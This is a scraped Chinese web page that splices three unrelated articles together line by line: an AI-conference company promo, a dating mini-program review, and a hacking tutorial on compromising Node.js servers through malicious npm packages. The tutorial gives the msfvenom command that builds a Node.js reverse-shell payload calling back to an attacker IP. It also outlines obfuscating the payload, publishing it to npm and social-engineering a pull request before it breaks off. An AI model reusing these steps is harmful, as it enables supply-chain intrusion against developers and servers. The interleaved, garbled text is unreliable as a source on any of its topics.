极链科技Video,js生产服务器的
分类:科技

原标题:世界人工智能大会来了!极链科技Video++金明邀你领略AI力量

原标题:我是这样黑进你Node.js生产服务器的

原标题:陌生人社交小程序「拼拼碰碰」:拒绝网聊,直接奔现

2018年9月17日,备受各界关注的WAIC 2018 世界人工智能大会将在上海西岸拉开帷幕,AI文娱独角兽科技企业极链科技Video++CEO兼创始人金明受邀出席,并将带来精彩演讲。

来源:HackingSexy

style="font-size: 16px;">

陌生人社交一直是创业者与资本关注的热门赛道之一,在36氪看来,绝大多数陌生人社交产品已经把“连接”的效率提升到了一个极高的水准。但在完成连接之后,用户之间进一步“认识”的效率依然低下。常用的社区话题运营、个人主页等方式并不能解决用户想要直观且高效的了解对方的诉求。

图片 1

TL,DR:

那么从线上到线下会否是一个可行的模式?中间产生的安全隐患如何解决?

金明,极链科技Video++创始人兼CEO,2012在美国开始创业,并于2014年10月在上海创立极链科技Video++,从0到1创建了目前65%为产品研发及工程师的公司团队,创业年限近6年;21岁时获得福布斯中国30位30岁以下的创业者称号;现任上海市政协崇明区政协委员;目前马云湖畔大学四届,是湖畔大学最年轻的企业家学员。

这篇文章讲述了从一个黑客的角度,以渗透前端项目为目标,从生成 payload,混淆,隐藏 payload,发布 npm,社会工程学提 PR,运行脚本,反向连接到攻击主机,最终主机拿到服务器 shell 的故事。

图片 2

图片 3

正片:

「拼拼碰碰」是一个基于微信小程序的陌生人社交平台,创始人朱皓贤对自身的定位是一家陌生人交友O2O平台。拼拼碰碰的 slogon 是“让更多互感兴趣的人在现实中真实地认识”,简而言之,他们认为面对面的交流不能被技术取代,在通过线上完成了高效的连接后,下一步不是“网聊”,而是直接“奔现”。

由金明创立的极链科技Video++是以人工智能为核心,专注新文娱领域的AI科技公司。多年来,极链科技Video++深耕以文娱为基础的计算机视觉技术的自主研发,其文娱人工智能系统「VideoAI」与视频互动操作系统「VideoOS」已规模化商用,并成为新文娱领域的视频应用技术标准。

前端工程师的口头禅是啥?npm install!

朱皓贤引用了 YC 合伙人 Paul Graham 的一句话,"It's hard to say exactly what is about face-to-face contact that makes deals happen, but whatever it is, it hasn't yet been duplicated by technology."(科技日新月异,人性更古不变,只有现实中的交流才能最高效地认识并建立人与人之间的关系与信任)

其中,「VideoAI」已实现场景、物体、人脸、品牌、表情、动作、地标、视觉特征检索8大维度的数据结构化,同步生成轨迹流数据,通过复合推荐算法将元素信息升级为情景信息,直接赋能各种商业化场景。人脸全序列采样辨识算法对识别视频内的侧脸、面部大面积遮挡等极端情况都有着非常高的准确率,整体准确率可达99.9%;支持545个商业价值物体模型,同框追踪维度达32个;场景、品牌、地标的准确率可分别达到99.4%、98.8%与95.5%以上。

这个命令从 npm 仓库中下载一堆从项目 package.json 中声明的依赖,下载完依赖后,再下载依赖中 package.json 声明的依赖,下载完依赖的依赖后,再下载依赖中 package.json 声明的依赖中的 package.json 声明的依赖,下载完依赖后…………

他表示,拼拼碰碰的产品形态更像是介于严肃相亲与线上交友之间,在实现高效连接后,由平台介入,安排线下会面,具体流程如下:

极链科技Video++创始人兼CEO金明也表示,“极链科技Video++聚焦’AI科技打造新文娱经济体’战略。一方面,在VideoAI和VideoOS的基础上赋能AI产品线的深度和广度;另一方面,合作众多品牌及电商放大商业变现,并以自制新商业IP和赋能传统内容的方式实现新文娱经济的万亿产业升级。”

然后下了一堆你都不知道从哪里来的 npm 包。

  • 填写资料,包括个人基本信息、标签、兴趣爱好、自我介绍等。
  • 填写自己的目的(新朋友、恋爱对象、结婚对象)、方便线下见面的时间,见面时想聊什么,以及见面的形式。目前平台上主要以 2 对 2 为主,即会将两组匹配的嘉宾凑在一起。
  • 填完所有资料后,用户可以选择等待被邀请约会,也可以在平台每天推荐的 8 位潜在约会嘉宾中主动邀约。
  • 无论是男方主动邀约还是女方主动邀约,最终都由女方选择见面的地点,如果女方不介意,平台会将约会地点定在如咖啡厅之类的开放公共空间。
  • 成功匹配后,平台会在碰面前 3 小时前开放聊天室(目前是微信群),方便碰面的联络。
  • 整个流程中都会有一名平台方的运营人员参与线下小聚的落地。

据悉,极链科技Video++目前已形成由AI场景营销平台、文娱电商、互动娱乐、新IP主题商业等组成的业务矩阵,构建了完整的产业闭环。

图片 4

图片 5

由极链科技Video++自主研发的AI场景营销平台——「ASMP」(AI Scene Marketing Platform),利用「VideoAI」积累的海量视频内容标签在视频与广告间进行复合双向匹配,在用户对广告品牌文化接受度最高的节点推送内容关联广告,在最优的时间点,以最合适的广告展现形态进行品牌曝光,大大提升用户体验,进而改善广告效果,转化率提升在50%以上。

图片 6

小程序介绍页面

图片 7

前端工程师的另一个口头禅是什么?npm run dev!

在体验完整个产品后的一个直观感受是:拼拼碰碰以女性的体验与需求为导向,注重安全与隐私; 2 对 2 小聚氛围更轻松;通过个性化推荐完成线上匹配后,线下见面能够提高对邀约对象更全面的了解。

在文娱电商领域,极链科技Video++提供的整套文娱电商运营方案,已完成与百家品牌商和供应链的深度合作,并接入芒果TV、爱奇艺、腾讯视频、优酷视频等平台流量,开展电商战略合作。目前,Video++已与全网热点IP如《火箭少女101》、《爸爸去哪儿6》、《明日之子》、《明星大侦探》、《盗墓笔记:沙海》、《歌手2018》、《火星情报局》、《如懿传》、《中餐厅》、《妈妈是超人》等67%全网热门大IP达成深度运营合作。

嗯!界面显示 compile successful!很完美的一次编译!你觉得是时候展示真正的技术了!

拼拼碰碰仍处于跑 MVP 的阶段,暂时没有开始付费验证。但是关于商业模式朱皓贤表示拼拼碰碰的主要收入会与用户碰面次数直接关联,即与用户利益一致。除此之外,因为涉及线下场景,因此为B端导流,收引流费会是另一个思路。

据悉,本届世界人工智能大会共吸引来自谷歌、华为、微软、腾讯、阿里、商汤、极链科技Video++、七牛云、科大讯飞等国内外行业领军企业及顶尖行业人才,集聚最新前沿技术,通过专业的行业解决方案,共同定义和探索 AI 未来。极链科技Video++除了登台带来精彩演讲,还将携带最新技术产品亮相“创新算法”展区,并通过“人机交互创新应用赛”的获胜权益,争夺世界人工智能创新大赛最高荣誉SAIL奖,精彩纷呈。9月17日,让我们随极链科技Video++一起,领略当下最热的AI力量!返回搜狐,查看更多

此时,在网线的另一端,一个黑客微微一笑:又有一个肉鸡上线了。

数据上,平台已促成超过 1000 人的线下碰面,男女比例 4:6 ,用户平均年龄28岁,90%以上本科及以上学历。其中 70% 的女生选择 2 对 2 碰面,且碰面后用户的 7 日留存在 93 %左右,每周线下碰面的次数一直在翻倍。

责任编辑:

这中间都发生了什么?

在问及用户安全的问题上,朱皓贤表示,滴滴顺风车的事件主因是1对1在封闭的场景,拼拼碰碰只会考虑多人、 公开并有第三方合作伙伴陪同下的场景(如桌游店、咖啡厅等)的形式。未来还会加入类似身份验证等更加可靠的认证体系,保护用户的安全与隐私。

生成 Payload

采访的最后,朱皓贤表示,拼拼碰碰的目标是在产品正式上线的第三个季度到第四个季度之间做到100万用户,基于此,团队目前正在寻求天使轮融资,主要用于团队建设与推广运营,以便应对更大规模的增长并丰富线下场景的多元化。

经验丰富的金鱼佬都知道,要钓鱼,是肯定要先做鱼钩的。黑客也要钓鱼,鱼钩是啥?在黑客的世界里,有一个鱼钩店,叫做 msfvenom,专治各种款(架)式(构),各种型(语)号(言)的鱼(机器)。msfvenom 是 metasploit 的一部分,集成在了 Kali 系统里面。在 Kali 的官网,有现成的虚拟机镜像,下载了就能用。

拼拼碰碰创始人朱皓贤为猎豹移动海外战略及商业初期团队,曾在 Rocket Internet 内部做 foodpanda 香港的创始团队,而 Rocket Internet 是一家以模仿成熟市场成功商业模式, 在新兴市场高效复制的公司; 联合创始人廖婉君为初创企业爱普酷客联合创始人,猎豹移动 Clean Master 技术总监,联发科资深研发与项目管理。

在 Kali 的 Terminal 里输入:

虽然拼拼碰碰的早期 MVP 数据不差,朱皓贤也表示种子用户的反馈良好,但这批种子用户的来源是以豆瓣这单一渠道为主。因此如何一边继续高效的做用户增长,一边保持平台上用户质量会成为摆在团队面前的一个问题;其次为B端引流这一模式还有待验证。

msfvenom -l | grep node

关于陌生人社交,36氪认为,越来越多的社交用户对纯线上的匹配与连接已经失去热情。在用户开始重视交友效率后,会逐渐从纯线上这种费时且不稳定的方式,迁移到面对面的线下交友。

可以列出所有支持 Node.js 的 payload。这相当于到店里问:老板!我要买鱼钩!要能钓 Node.js 的那种!老板:好嘞!要哪款?

而线下交友的优势在于,用户之间能够更全面直观的了解对方,对方的谈吐、表情、动作都可以作为评判的标准之一。而且被社交用户诟病的线上线下不同人格的问题也能被解决。毕竟确认过眼神后,才能更好的维持关系,无论线上还是线下。

图片 8

而在交友效率得到提升后,对于团队来说的下一个问题是:如何将这种解决方案快速复制、裂变,并且不损害用户利益,保证用户安全。

图片 9

目前,市场上并没有一款成功的 O2O 社交平台,类似拼拼碰碰这类模式的项目能否获得用户与资本的双重认可?这会是一门小而美的生意还会是陌生人社交的新战场?欢迎在文章底部留言评论。返回搜狐,查看更多

在这里,我们选择 nodejs/shell_reverse_tcp,其实业界最常用的 payload 是 meterpreter,但是这款鱼钩还没上市:

责任编辑:

如何生成我们的 payload 呢,输入:

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.199.165 LPORT=5432 -o index.js

这里说一下配置的参数:

  • -p nodejs/shell_reverse_tcp 指的是我们要用 nodejs/shell_reverse_tcp 这个 payload;
  • LHOST=192.168.199.165 指的是攻击主机的 IP 地址,由于这次攻击是内网演示,所以用了内网 IP 。公网攻击的话,就要配个公网 IP;
  • LPORT=5432 攻击主机这边的监听端口,payload 运行后,被攻击方会尝试连接攻击主机的这个端口;
  • -o index.js 意思是输出到 index.js 这个文件中。

敲完命令之后,我们可以在当前目录拿到一个名为 index.js 的 payload,也就是我们刚买到的鱼钩。payload 很小很小,只有 803 字节。用

cat index.js

命令,可以看到 payload 长什么样。

图片 10

图片 11

这时候警觉的前端就会跳出来怼我:胸底,你这代码里又调用 cmd 又调用 /bin/sh,还把攻击 IP 和端口都暴露出来了,傻子才会运行你的代码哦?

别急嘛,好戏才刚刚开始。

混淆

传统的杀毒软件,是通过检测文件特定字符来确定病毒特征的,而通过修改特征码绕过杀毒软件的检测,我们称之为免杀。

而 Java 的变化,简直比海贼王里的路飞还要伸缩自如。

举个例子,一行简单的代码:

alert(1)

本文由奥门金沙网址发布于科技,转载请注明出处:极链科技Video,js生产服务器的

上一篇:他欠我一个人情,网络罪犯如何利用区块链技术 下一篇:没有了
猜你喜欢
热门排行
精彩图文